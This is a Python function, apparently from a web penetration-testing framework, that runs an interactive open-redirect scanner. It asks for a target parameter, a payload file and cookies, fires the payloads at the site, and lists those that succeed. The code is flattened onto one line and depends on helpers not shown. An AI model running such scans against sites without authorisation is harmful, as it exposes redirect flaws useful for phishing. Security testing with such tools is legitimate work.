def openredirect(web): print(GR+' [*] Loading module...') time.sleep(0.6) #print(R+'\n ===========================================') #print(R+'\n O P E N R E D I R E C T C H E C K E R') #print(R+' ——·‹›·––·‹›·——·‹›·——·‹›·––·‹›·——·‹›·——·‹›·–\n') from core.methods.print import pvln pvln("open redirect checker") try: param = input(O+' [#] Scope parameter to test (eg. /redirect.php?site=foo) :> ') if '?' in param and '=' in param: if param.startswith('/'): m = input(GR+'\n [!] Your path starts with "/".\n [#] Do you mean root directory? (Y/n) :> ') if m == 'y': web00 = web + param elif m == 'n': web00 = web + param else: print(R+' [-] U mad?') else: web00 = web + '/' + param else: print(R+' [-] Your input does not match a parameter...') param = input(O+' [#] Enter paramter to test :> ') pa = input(" [?] Parallel Attack? (enter if not) :> ") parallel = pa is not "" print(GR+' [*] Configuring relative headers...') time.sleep(0.8) gen_headers = {'User-Agent':'Mozilla/5.0 (Windows; U; Windows NT 6.1; rv:2.2) Gecko/20110201', 'Accept-Language':'en-US;', 'Accept-Encoding': 'gzip, deflate', 'Accept': 'text/html,application/xhtml+xml,application/xml;', 'Connection':'close'} print(O+' [!] Enter path to payload file '+R+'(Default: files/payload-db/openredirect_payloads.lst)') fi = input(O+' [#] Your input (Press Enter if default) :> ') if fi == '': fi = 'files/payload-db/openredirect_payloads.lst' getPayloads0x00(fi) else: if os.path.exists(fi) == True: print(G+' [+] File found under '+fi) getPayloads0x00(fi) else: print(R+' [-] File not found... Using default payload...') fi = 'files/payload-db/openredirect_payloads.lst' getPayloads0x00(fi) input_cookie = input("\n [#] Got any cookies? [just enter if none] :> ") if(len(input_cookie) > 0): gen_headers['Cookie'] = input_cookie print(GR+' [*] Configuring payloads with Url...') success = [] if not parallel: check0x00(web00, gen_headers, payloads) else: paylists = listsplit(payloads, round(len(payloads)/processes)) with Pool(processes=processes) as pool: res = [pool.apply_async(check0x00, args=(web00,gen_headers,l,)) for l in paylists] for y in res: i = y.get() success += i if success: print(" [+] Open Redirect Vulnerability found! Successful payloads:") for i in success: print(i) else: print(R + "\n [-] No payload succeeded."+C) except KeyboardInterrupt: print(R+' [-] User Interruption Detected!') pass